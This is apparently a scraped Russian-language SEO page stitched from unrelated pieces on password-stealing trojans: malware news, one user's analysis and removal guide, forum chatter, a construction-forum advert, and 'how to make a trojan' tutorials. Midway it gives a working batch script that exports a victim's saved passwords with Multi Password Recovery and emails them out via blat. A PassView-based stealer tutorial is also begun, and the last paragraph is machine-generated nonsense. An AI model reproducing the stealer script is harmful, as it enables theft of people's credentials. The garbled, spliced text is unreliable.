Троян Ворующий Пароли
Все новые и новые вирусы выходят «в свет» благодаря стараниям вирусописателей, некоторые из которых весьма талантливы. Эту бы энергию да в мирное русло… Но что мечтать — давайте лучше узнаем больше о новой заразе, которая особо опасна для пользователей любимого многими браузера Mozilla Firefox.
Так вот, новый вирус, Trojan-PWS-Nslog, без ведома владельца ПК может заставить браузер Firefox сохранять данные (пароли/логины) различных сайтов, посещаемых пользователем, и затем передает все это своему создателю. Обнаружен вирус стараниями специалистов компании Webroot. В продолжении — более подробная информация о зловредной программе.
Записки молодого админа
Краткая техническая информация для IT’шников
В этом разделе кратко опишу как я его анализировал. Может кому будет интересно. Размер файла 19456 байт. MD5-хэш — d5dbd34b12eb653d07ec17287fd3f26c. Судя по всему, написан на Delphi и упакован UPX’ом.
Как уже говорил, спам был в виде граффити на моей стенке в контакте, там была нарисована «ссылка» на vk-****.msk.ru. Если зайти на этот адрес, то происходил редирект на http://vk****-****.blogspot.com/ и уже в этом блоге предлагают скачать этот самый троян, под видом программы для взлома аккаунтов контакта и «включить защиту от взлома своей анкеты» (от последнего чуть под стол не свалился).
В анализе участвовали след. утилиты:
Autoruns — Позволяет определить, какие приложения запускаются автоматически при загрузке системы и выполнении входа в систему. Также показывает полный перечень путей в реестре и на диске, где может быть настроен автоматический запуск приложений.
Process Explorer — Отображает файлы, разделы реестра, библиотеки DLL и прочие объекты, открытые или загруженные различными процессами, а также другую информацию, включая владельца процесса.
AVZ4 — Очень хорошая утилита, помогающая исследовать систему (ВАЖНО. В кривых руках может загубить систему. ).
VirtualBox — виртуальная машина, на ней я исследовал (запускал) вирус.
Как лечить
Загрузиться в безопасном режиме (жать F8 после включения компа). Открыть диспетчер задач (Ctrl+Alt+Del или Ctrl+Shift+Esc) и «убить» процесс «activate.exe», если таковой имеется. Потом удалить файлы C:\Windows\activate.exe и C:\Windows\System32\loio.jho, удалить ярлык из папки Автозагрузка (Пуск -> Программы -> Автозагрузка) и удалить все файлы из временной папки пользователя (обычно C:\Documents and Settings\ИМЯ_ПОЛЬЗОВАТЕЛЯ\Local Settings\Temp). Открыть редактор реестра (Пуск -> Выполнить. ввести regedit и нажать ОК), перейти в ветку HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\, найти параметр Shell, дважды щелкнуть по нему мышкой и заменить его значение на «Explorer.exe» (без кавычек). Т.ж. нужно перейти в папку C:\Windows\System32\Drivers\etc\, открыть файл hosts в блокноте и удалить из него все строки за исключением «127.0.0.1 localhost».
Как вирусы трояны воруют пароли и как сделать троян
Так это же самый лучший браузер для хакермана.
Ни один уважающий себя вирус не полезет на комп,где есть Амиго и прочий рассадник.
А если еще и яндекс.бар с бинг.баром поставить,то компьютер сам начнет взламывать пентагон и рассылать всем открытки с рождественским посланием
Я имею ввиду ты серьезно в «хакиры» записался и постишь эту чушь? Как уже порекомендовали — школу закончи. А вообще желательно заняться самообразованием, судя по набору значков на десктопе и операционке тебе даже просто до специалиста по безопасности — как до Китая раком. Но все в твоих руках.
В Google Play обнаружен ворующий пароли троян
Есть уникальная особенность «фонарика» — его вредоносные функции деактивируются, если зараженный смартфон находится в России, Украине или Белоруссии. Эксперты антивирусной компании ESET полагают, что этот ход сделан для избежания хакерами уголовного преследования на территории своей страны.
В стандартном магазине приложений Google Play найдена опасная программа, которая способна похищать данные от сервисов мобильных банков и соцсетей, да и в целом любых установленных программ. После установки скрытый троян запрашивает права администратора, получив которые автоматически отправляет на некий сервер, специально для этого созданный, собранную информацию о гаджете и его владельце, включая снимок, сделанный фронтальной камерой.
Создаем троян ворующий пароли
Крупные корпорации бьют тревогу: теперь вирусы способны не только выводить из строя их компьютеры, где содержится ценная информация, но и воровать пароли, данные и даже деньги. Об одном таком вирусе стало известно недавно. Об обнаружении нового «трояна», так называют вирусы специалисты, известила антивирусная компания «Лаборатория Касперского».
Целью данной статьи является проведение анализа поведения типичного вирусного ПО, поиск решений для устранения последствий с наименьшими усилиями, а также написание общих рекомендаций для быстрого восстановления работоспособности ОС Windows после вирусной атаки.
Создаем троян ворующий пароли
Главный модуль страшного вируса уже назвали именем немецкого математика Иоганна Карла Фридриха Гаусса. За что ему и еще нескольким ученым-математикам, чьими именами названы файлы «трояна», выпала такая честь, неизвестно, так же как и неизвестны способы борьбы с опасным вредителем.
Как говорят эксперты, не исключено, что за созданием подобных программ стоят не только крупнейшие корпорации, но и обычные мальчишки от 16 до 18 лет. Юношеская дерзость, помноженная на гениальность и приправленная новейшей техникой, способна создать невероятные по силе разрушения программы. Печально, что гениальны пока в киберпространстве в основном злодеи.
Троян DNS Changer ворует пароли пользователей — Вконтакте
Принцип работы DNS Changer заключается в изменении настроек DNS таким образом, чтобы преобразование доменных имён в IP-адреса шло через DNS-сервера злоумышленников. Таким образом, пользователь, набравший в адресной строке браузера «www.vkontakte.ru», попадёт на сайт, физически расположенный по другому IP-адресу.
В Trend Micro считают, что появление фальшивого сайта «ВКонтакте» — одного из самых популярных сайтов рунета — свидетельство того, что количество русскоязычных жертв трояна DNS Changer достигло некой критической массы.
Троян Ворующий Пароли
• Форум для строителей. Снипы, типовые серии, -Eurosoft, Lira Soft, ЛИРА САПР, NormCAD, ФОК, Base и Foundation, типовые серии, типовые проекты и госты все бесплатно можно скачать с нашего форума. А так же обсуждение MagiCAD, стройконсультант, NormaCS и Грандсмета»>Форум для строителей и проектировщиков. ЛИРА софт, ЛИРА САПР, STARK ES, SCAD Office, ФОК Софт, BASE и Фундамент, NormCAD, Mathcad, Project Studio CS, СПДС GraphiCS, Типовые серии и проекты, нормативная документация- СНиПы, ГОСТы — скачать бесплатно с форума. А так же обсуждение MagiCAD, СтройКонсультант, NormaCS, Гранд Смета
Книга «Малозаглубленный (мелкозаглубленный) ленточный фундамент своими руками» представляет собой свод необходимой справочно-нормативной информации по проектированию и строительству малозаглубленых ленточных фундаментов (МЗЛФ) своими руками на дачном или усадебном участке для людей без специального образования (строителей-любителей).
Как создать файл ворующий пароли
Пару дней назад мне на стенке в контакте один из друзей оставил граффити с сообщением, что он взломал мой аккаунт, т.ж. там была ссылка на сайта vk-****.msk.ru. Ну да. Еще бы. ) Ему я сразу отписал, чтобы полечил себя да пароль сменил. Но вот ссылка меня все же заинтересовала, хотя я точно знал, что это троян (именно он меня и заинтересовал). Решил сходить по этой ссылке. В результате мне предложили скачать программу, которая якобы юзает недавно найденную уязвимость контакта и позволяет взломать любую учетку.
Для начала нам понадобится обычный текстовый редактор, я воспользуюсь обычным блокнотом (Пуск->Выполнить->notepad), запускаем. Так теперь нам надо скачать программку PassView Pro (обычная версия не подойдет, только pro), скачать мы ее можем здесь. Скачали, теперь переименуйте её, например у меня будет “passexport.exe”. Давайте создадим папку(где хотите), у меня она будет находится “c:\temp”. Создали? Теперь кидаем туда “passexport.
Троян Ворующий Пароли
Линукс ни кого и ничего не пытается захватить!! ! зачем ставить себе никсы а потом возмущятся что «нихуя ни работает» и все косяки валить на ОС? никсоподобная система это отражение ее владельца) ) она будет работать ровно и четко только если вы ее поодобным образом настроите!
зы бред написан под вопросом=)
Отчасти согласен с вами, решил однажды посмотреть что за Линукс, но с непривычки очень и очень долго разбирался))) сначала нд тем как установить а потом как наладить подключение к инету. Но материть его тоже не буду потому что не успел с ним поработать как следует. Для линукса нужна подготовка прежде чем за него сесть нужно прочитать соотв. литературу
Как создать троян ворующий пароли
Я не знаю как назвать таких которые пишут ой ето троян блабла бла не качайте так люды в чо мона же и не качать самим написать такую програму прост в инете поискать все что нада и записать вы чего мне к примеру 12 лет я уже даже немного понимаю как токе сделать а чо вы орете комут лет 30 — 40 наверна орут и бомбят вы чо
@Nicholas Vav Начнём с того, что слово «команда» применяют только люди, далёкие от программирования. Программисты говорят «оператор», «мнемоника», «директива», «код операции», причём, на c++ нет мнемоник и кодов операций, так как это язык высокого уровня. Операторы делятся на группы. Например, есть арифметические: +, -, *, /. Причём, если левый операнд целый, то он делится на цело. Есть операторы приведения к типу — идентификаторы типов в круглых скобках. Есть оператор %, вычисляющий остаток от деления на цело. А есть операторы логические. & — побитовое И, | — побитовое ИЛИ, ^ — побитовое исключающее ИЛИ, ! — побитовое НЕ. Есть операторы, управляющие порядком исполнения, например, if — условный оператор, for — оператор заголовка цикла.
Троян Ворующий Пароли
Привет,сегодня мы из Multi Password Recovery сделаем программу(стиллер) для кражи всех паролей с компа
Первое что нам нужно это сам MPR. качаем по ссылке
Клац
установим MPR в отдельную папку. установили? Удаляем установку- должно остаться 6 файлов, качаем blat ——
Клац
@echo off
:start
ping ya.ru -n 5 >nul
if %errorlevel%==0 (goto send) else (goto end)
:end
goto :start
:send
blat.exe -install -server smtp.yandex.ru -port 587 -f Логин @yandex.ru -u Логин -pw Пароль
mpr.exe /export
ren *.mpf pass.mpf
blat.exe -bоdу PassReg -to кому отправлять @yandex.ru -attach pass.mpf
del %Temp%\*.* /Q /S /F
Онлайновая атака
Как действуют эти люди? Какими способами они добиваются своих корыстных целей? Как защититься от них? Со всеми этими вопросами мы обратились к одному из самых компетентных людей в области анализа вредоносных программ, нацеленных на кражу паролей и виртуальной собственности в онлайн-играх. Обо всех хитростях сетевых мошенников и о том, как с ними бороться, нам рассказал Сергей Голованов, вирусный аналитик «Лаборатории Касперского».
В России число поклонников MMORPG неуклонно растет, но по сравнению с Европой, США и уж тем более с азиатскими странами, мы далеко позади. Зато у нас крайне популярны браузерные RPG. Главная особенность атак в рунете — использование фишинга для распространения вредоносного ПО. Например, в Сети постоянно появляются сайты-клоны одной из самых популярных браузерок «Бойцовский клуб» (да и многих других игр тоже).
Android-троян ворует пароли от банковских приложений
Чтобы завладеть устройством, троян запрашивает у пользователя расширенные права в системе. После завершения установки троян выводит на главный экран виджет с прогнозом погоды, «позаимствованный» у легального приложения. Тем временем, на командный сервер в фоновом режиме передается информация об устройстве.
Вирусная лаборатория международного разработчика антивирусного программного обеспечения ESET предупреждает владельцев устройств на базе Android о появлении нового мобильного банковского трояна, который маскируется под приложения с прогнозом погоды на Google Play, блокирует экран и ворует пароли от банковских приложений.
Троян, ворующий пароли, распространяется на YouTube
По информации специалистов, вирус распространяется в виде самораспаковывающегося архива RAR SFX. Как правило, ссылки на него публикуются в комментариях к видеороликам на YouTube под видом полезных приложений. Отмечены случаи распространения трояна через сервис Яндекс.Диск.
«Вредоносная программа, способная заражать компьютеры под управлением ОС Microsoft Windows, предназначена для хищения логинов, паролей и другой конфиденциальной информации. Выявлено несколько модификаций, детектируемых также под наименованием Trojan.PWS.Stealer.23198», — говорится в официальном блоге Dr.Web.
Создаем троян для кражи пароля
Дальше нужно запомнить путь к директории откуда запущен батник (мы же должны копировать данные на нашу же флешку, а не на какой-нибудь жесткий диск) потому что код, который идет дальше сбивает значение переменной CD (текущая рабочая папка).
Power Batch ищет тему справки для ограничения трафика. Немаленький размер на хлебозаводе позволяет выводить отчеты. Удерживая клавиши для охлаждения, троян для кражи пароля, как и индивидуальное редактирование, подразумевает полную передачу данных.
